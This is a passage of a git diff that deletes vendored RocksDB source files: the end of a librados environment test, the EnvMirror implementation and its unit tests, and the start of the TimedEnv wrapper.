-      std::cout << s2.ToString() << std::endl;
-    }
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-class EnvLibradosMutipoolTest : public testing::Test {
-public:
-  // we will use all of these below
-  const std::string client_name = "client.admin";
-  const std::string cluster_name = "ceph";
-  const uint64_t flags = 0;
-  const std::string db_name = "env_librados_test_db";
-  const std::string db_pool = db_name + "_pool";
-  const std::string wal_dir = "/wal";
-  const std::string wal_pool = db_name + "_wal_pool";
-  const size_t write_buffer_size = 1 << 20;
-  const char *keyring = "admin";
-  const char *config = "../ceph/src/ceph.conf";
-
-  EnvLibrados* env_;
-  const EnvOptions soptions_;
-
-  EnvLibradosMutipoolTest() {
-    env_ = new EnvLibrados(client_name, cluster_name, flags, db_name, config, db_pool, wal_dir, wal_pool, write_buffer_size);
-  }
-  ~EnvLibradosMutipoolTest() {
-    delete env_;
-    librados::Rados rados;
-    int ret = 0;
-    do {
-      ret = rados.init("admin"); // just use the client.admin keyring
-      if (ret < 0) { // let's handle any error that might have come back
-        std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      ret = rados.conf_read_file(config);
-      if (ret < 0) {
-        // This could fail if the config file is malformed, but it'd be hard.
-        std::cerr << "failed to parse config file " << config
-                  << "! error" << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * next, we actually connect to the cluster
-       */
-
-      ret = rados.connect();
-      if (ret < 0) {
-        std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * And now we're done, so let's remove our pool and then
-       * shut down the connection gracefully.
-       */
-      int delete_ret = rados.pool_delete(db_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << db_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-      delete_ret = rados.pool_delete(wal_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << wal_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-    } while (0);
-  }
-};
-
-TEST_F(EnvLibradosMutipoolTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-  std::vector<std::string> v = {"/tmp/dir1", "/tmp/dir2", "/tmp/dir3", "/tmp/dir4", "dir"};
-
-  for (size_t i = 0; i < v.size(); ++i) {
-    std::string dir = v[i];
-    std::string dir_non_existent = dir + "/non_existent";
-    std::string dir_f = dir + "/f";
-    std::string dir_g = dir + "/g";
-
-    ASSERT_OK(env_->CreateDir(dir.c_str()));
-    // Check that the directory is empty.
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_non_existent.c_str()));
-    ASSERT_TRUE(!env_->GetFileSize(dir_non_existent.c_str(), &file_size).ok());
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(0U, children.size());
-
-    // Create a file.
-    ASSERT_OK(env_->NewWritableFile(dir_f.c_str(), &writable_file, soptions_));
-    writable_file.reset();
-
-    // Check that the file exists.
-    ASSERT_OK(env_->FileExists(dir_f.c_str()));
-    ASSERT_OK(env_->GetFileSize(dir_f.c_str(), &file_size));
-    ASSERT_EQ(0U, file_size);
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(1U, children.size());
-    ASSERT_EQ("f", children[0]);
-
-    // Write to the file.
-    ASSERT_OK(env_->NewWritableFile(dir_f.c_str(), &writable_file, soptions_));
-    ASSERT_OK(writable_file->Append("abc"));
-    writable_file.reset();
-
-
-    // Check for expected size.
-    ASSERT_OK(env_->GetFileSize(dir_f.c_str(), &file_size));
-    ASSERT_EQ(3U, file_size);
-
-
-    // Check that renaming works.
-    ASSERT_TRUE(!env_->RenameFile(dir_non_existent.c_str(), dir_g.c_str()).ok());
-    ASSERT_OK(env_->RenameFile(dir_f.c_str(), dir_g.c_str()));
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_f.c_str()));
-    ASSERT_OK(env_->FileExists(dir_g.c_str()));
-    ASSERT_OK(env_->GetFileSize(dir_g.c_str(), &file_size));
-    ASSERT_EQ(3U, file_size);
-
-    // Check that opening non-existent file fails.
-    unique_ptr<SequentialFile> seq_file;
-    unique_ptr<RandomAccessFile> rand_file;
-    ASSERT_TRUE(
-      !env_->NewSequentialFile(dir_non_existent.c_str(), &seq_file, soptions_).ok());
-    ASSERT_TRUE(!seq_file);
-    ASSERT_TRUE(!env_->NewRandomAccessFile(dir_non_existent.c_str(), &rand_file,
-                                           soptions_).ok());
-    ASSERT_TRUE(!rand_file);
-
-    // Check that deleting works.
-    ASSERT_TRUE(!env_->DeleteFile(dir_non_existent.c_str()).ok());
-    ASSERT_OK(env_->DeleteFile(dir_g.c_str()));
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_g.c_str()));
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(0U, children.size());
-    ASSERT_OK(env_->DeleteDir(dir.c_str()));
-  }
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBBasics) {
-  std::string kDBPath = "/tmp/DBBasics";
-  std::string walPath = "/tmp/wal";
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-  options.env = env_;
-  options.wal_dir = walPath;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  delete db;
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBBulkLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInRandomOrder1";
-  std::string walPath = "/tmp/wal";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-  options2.wal_dir = walPath;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  if (!s2.ok()) {
-    std::cerr << s2.ToString() << std::endl;
-  }
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBTransactionDB) {
-  std::string kDBPath = "/tmp/DBTransactionDB";
-  // open DB
-  Options options;
-  TransactionDBOptions txn_db_options;
-  options.create_if_missing = true;
-  options.env = env_;
-  TransactionDB* txn_db;
-
-  Status s = TransactionDB::Open(options, txn_db_options, kDBPath, &txn_db);
-  assert(s.ok());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple OptimisticTransaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  s = txn->Put("abc", "def");
-  assert(s.ok());
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = txn_db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = txn_db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  s = txn_db->Put(write_options, "abc", "xyz");
-  assert(s.ok());
-
-  // Attempt to read a key using the snapshot.  This will fail since
-  // the previous write outside this txn conflicts with this read.
-  read_options.snapshot = snapshot;
-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(s.IsBusy());
-
-  txn->Rollback();
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = txn_db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = txn_db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  txn->SetSavePoint();
-  read_options.snapshot = txn_db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  // Since the snapshot was advanced, the write done outside of the
-  // transaction does not conflict.
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Decide we want to revert the last write from this transaction.
-  txn->RollbackToSavePoint();
-
-  // Commit.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvMirror is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_mirror.cc b/thirdparty/rocksdb/utilities/env_mirror.cc
deleted file mode 100644
index 64c0b68..0000000
--- a/thirdparty/rocksdb/utilities/env_mirror.cc
+++ /dev/null
@@ -1,259 +0,0 @@
-// Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_mirror.h"
-
-namespace rocksdb {
-
-// An implementation of Env that mirrors all work over two backend
-// Env's.  This is useful for debugging purposes.
-class SequentialFileMirror : public SequentialFile {
- public:
-  unique_ptr<SequentialFile> a_, b_;
-  std::string fname;
-  explicit SequentialFileMirror(std::string f) : fname(f) {}
-
-  Status Read(size_t n, Slice* result, char* scratch) {
-    Slice aslice;
-    Status as = a_->Read(n, &aslice, scratch);
-    if (as == Status::OK()) {
-      char* bscratch = new char[n];
-      Slice bslice;
-      size_t off = 0;
-      size_t left = aslice.size();
-      while (left) {
-        Status bs = b_->Read(left, &bslice, bscratch);
-        assert(as == bs);
-        assert(memcmp(bscratch, scratch + off, bslice.size()) == 0);
-        off += bslice.size();
-        left -= bslice.size();
-      }
-      delete[] bscratch;
-      *result = aslice;
-    } else {
-      Status bs = b_->Read(n, result, scratch);
-      assert(as == bs);
-    }
-    return as;
-  }
-
-  Status Skip(uint64_t n) {
-    Status as = a_->Skip(n);
-    Status bs = b_->Skip(n);
-    assert(as == bs);
-    return as;
-  }
-  Status InvalidateCache(size_t offset, size_t length) {
-    Status as = a_->InvalidateCache(offset, length);
-    Status bs = b_->InvalidateCache(offset, length);
-    assert(as == bs);
-    return as;
-  };
-};
-
-class RandomAccessFileMirror : public RandomAccessFile {
- public:
-  unique_ptr<RandomAccessFile> a_, b_;
-  std::string fname;
-  explicit RandomAccessFileMirror(std::string f) : fname(f) {}
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    Status as = a_->Read(offset, n, result, scratch);
-    if (as == Status::OK()) {
-      char* bscratch = new char[n];
-      Slice bslice;
-      size_t off = 0;
-      size_t left = result->size();
-      while (left) {
-        Status bs = b_->Read(offset + off, left, &bslice, bscratch);
-        assert(as == bs);
-        assert(memcmp(bscratch, scratch + off, bslice.size()) == 0);
-        off += bslice.size();
-        left -= bslice.size();
-      }
-      delete[] bscratch;
-    } else {
-      Status bs = b_->Read(offset, n, result, scratch);
-      assert(as == bs);
-    }
-    return as;
-  }
-
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // NOTE: not verified
-    return a_->GetUniqueId(id, max_size);
-  }
-};
-
-class WritableFileMirror : public WritableFile {
- public:
-  unique_ptr<WritableFile> a_, b_;
-  std::string fname;
-  explicit WritableFileMirror(std::string f) : fname(f) {}
-
-  Status Append(const Slice& data) override {
-    Status as = a_->Append(data);
-    Status bs = b_->Append(data);
-    assert(as == bs);
-    return as;
-  }
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    Status as = a_->PositionedAppend(data, offset);
-    Status bs = b_->PositionedAppend(data, offset);
-    assert(as == bs);
-    return as;
-  }
-  Status Truncate(uint64_t size) override {
-    Status as = a_->Truncate(size);
-    Status bs = b_->Truncate(size);
-    assert(as == bs);
-    return as;
-  }
-  Status Close() override {
-    Status as = a_->Close();
-    Status bs = b_->Close();
-    assert(as == bs);
-    return as;
-  }
-  Status Flush() override {
-    Status as = a_->Flush();
-    Status bs = b_->Flush();
-    assert(as == bs);
-    return as;
-  }
-  Status Sync() override {
-    Status as = a_->Sync();
-    Status bs = b_->Sync();
-    assert(as == bs);
-    return as;
-  }
-  Status Fsync() override {
-    Status as = a_->Fsync();
-    Status bs = b_->Fsync();
-    assert(as == bs);
-    return as;
-  }
-  bool IsSyncThreadSafe() const override {
-    bool as = a_->IsSyncThreadSafe();
-    assert(as == b_->IsSyncThreadSafe());
-    return as;
-  }
-  void SetIOPriority(Env::IOPriority pri) override {
-    a_->SetIOPriority(pri);
-    b_->SetIOPriority(pri);
-  }
-  Env::IOPriority GetIOPriority() override {
-    // NOTE: we don't verify this one
-    return a_->GetIOPriority();
-  }
-  uint64_t GetFileSize() override {
-    uint64_t as = a_->GetFileSize();
-    assert(as == b_->GetFileSize());
-    return as;
-  }
-  void GetPreallocationStatus(size_t* block_size,
-                              size_t* last_allocated_block) override {
-    // NOTE: we don't verify this one
-    return a_->GetPreallocationStatus(block_size, last_allocated_block);
-  }
-  size_t GetUniqueId(char* id, size_t max_size) const override {
-    // NOTE: we don't verify this one
-    return a_->GetUniqueId(id, max_size);
-  }
-  Status InvalidateCache(size_t offset, size_t length) override {
-    Status as = a_->InvalidateCache(offset, length);
-    Status bs = b_->InvalidateCache(offset, length);
-    assert(as == bs);
-    return as;
-  }
-
- protected:
-  Status Allocate(uint64_t offset, uint64_t length) override {
-    Status as = a_->Allocate(offset, length);
-    Status bs = b_->Allocate(offset, length);
-    assert(as == bs);
-    return as;
-  }
-  Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-    Status as = a_->RangeSync(offset, nbytes);
-    Status bs = b_->RangeSync(offset, nbytes);
-    assert(as == bs);
-    return as;
-  }
-};
-
-Status EnvMirror::NewSequentialFile(const std::string& f,
-                                    unique_ptr<SequentialFile>* r,
-                                    const EnvOptions& options) {
-  if (f.find("/proc/") == 0) {
-    return a_->NewSequentialFile(f, r, options);
-  }
-  SequentialFileMirror* mf = new SequentialFileMirror(f);
-  Status as = a_->NewSequentialFile(f, &mf->a_, options);
-  Status bs = b_->NewSequentialFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::NewRandomAccessFile(const std::string& f,
-                                      unique_ptr<RandomAccessFile>* r,
-                                      const EnvOptions& options) {
-  if (f.find("/proc/") == 0) {
-    return a_->NewRandomAccessFile(f, r, options);
-  }
-  RandomAccessFileMirror* mf = new RandomAccessFileMirror(f);
-  Status as = a_->NewRandomAccessFile(f, &mf->a_, options);
-  Status bs = b_->NewRandomAccessFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::NewWritableFile(const std::string& f,
-                                  unique_ptr<WritableFile>* r,
-                                  const EnvOptions& options) {
-  if (f.find("/proc/") == 0) return a_->NewWritableFile(f, r, options);
-  WritableFileMirror* mf = new WritableFileMirror(f);
-  Status as = a_->NewWritableFile(f, &mf->a_, options);
-  Status bs = b_->NewWritableFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::ReuseWritableFile(const std::string& fname,
-                                    const std::string& old_fname,
-                                    unique_ptr<WritableFile>* r,
-                                    const EnvOptions& options) {
-  if (fname.find("/proc/") == 0)
-    return a_->ReuseWritableFile(fname, old_fname, r, options);
-  WritableFileMirror* mf = new WritableFileMirror(fname);
-  Status as = a_->ReuseWritableFile(fname, old_fname, &mf->a_, options);
-  Status bs = b_->ReuseWritableFile(fname, old_fname, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/env_mirror_test.cc b/thirdparty/rocksdb/utilities/env_mirror_test.cc
deleted file mode 100644
index 2bf8ec8..0000000
--- a/thirdparty/rocksdb/utilities/env_mirror_test.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-//  Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_mirror.h"
-#include "env/mock_env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EnvMirrorTest : public testing::Test {
- public:
-  Env* default_;
-  MockEnv* a_, *b_;
-  EnvMirror* env_;
-  const EnvOptions soptions_;
-
-  EnvMirrorTest()
-      : default_(Env::Default()),
-        a_(new MockEnv(default_)),
-        b_(new MockEnv(default_)),
-        env_(new EnvMirror(a_, b_)) {}
-  ~EnvMirrorTest() {
-    delete env_;
-    delete a_;
-    delete b_;
-  }
-};
-
-TEST_F(EnvMirrorTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize("/dir/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists("/dir/f"));
-  ASSERT_OK(a_->FileExists("/dir/f"));
-  ASSERT_OK(b_->FileExists("/dir/f"));
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(a_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(b_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-
-  // Write to the file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  writable_file.reset();
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(a_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(b_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming works.
-  ASSERT_TRUE(!env_->RenameFile("/dir/non_existent", "/dir/g").ok());
-  ASSERT_OK(env_->RenameFile("/dir/f", "/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(a_->FileExists("/dir/g"));
-  ASSERT_OK(a_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(b_->FileExists("/dir/g"));
-  ASSERT_OK(b_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(
-      !env_->NewSequentialFile("/dir/non_existent", &seq_file, soptions_).ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile("/dir/non_existent", &rand_file,
-                                         soptions_).ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile("/dir/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile("/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_OK(env_->DeleteDir("/dir"));
-}
-
-TEST_F(EnvMirrorTest, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile("/dir/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_TRUE(!rand_file->Read(1000, 5, &result, scratch).ok());
-}
-
-TEST_F(EnvMirrorTest, Locks) {
-  FileLock* lock;
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(env_->LockFile("some file", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-}
-
-TEST_F(EnvMirrorTest, Misc) {
-  std::string test_dir;
-  ASSERT_OK(env_->GetTestDirectory(&test_dir));
-  ASSERT_TRUE(!test_dir.empty());
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile("/a/b", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_F(EnvMirrorTest, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, static_cast<char>(i));
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvMirror is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_timed.cc b/thirdparty/rocksdb/utilities/env_timed.cc
deleted file mode 100644
index 2afa0e0..0000000
--- a/thirdparty/rocksdb/utilities/env_timed.cc
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-// An environment that measures function call times for filesystem
-// operations, reporting results to variables in PerfContext.
-class TimedEnv : public EnvWrapper {
- public:
-  explicit TimedEnv(Env* base_env) : EnvWrapper(base_env) {}
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_sequential_file_nanos);
-    return EnvWrapper::NewSequentialFile(fname, result, options);
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
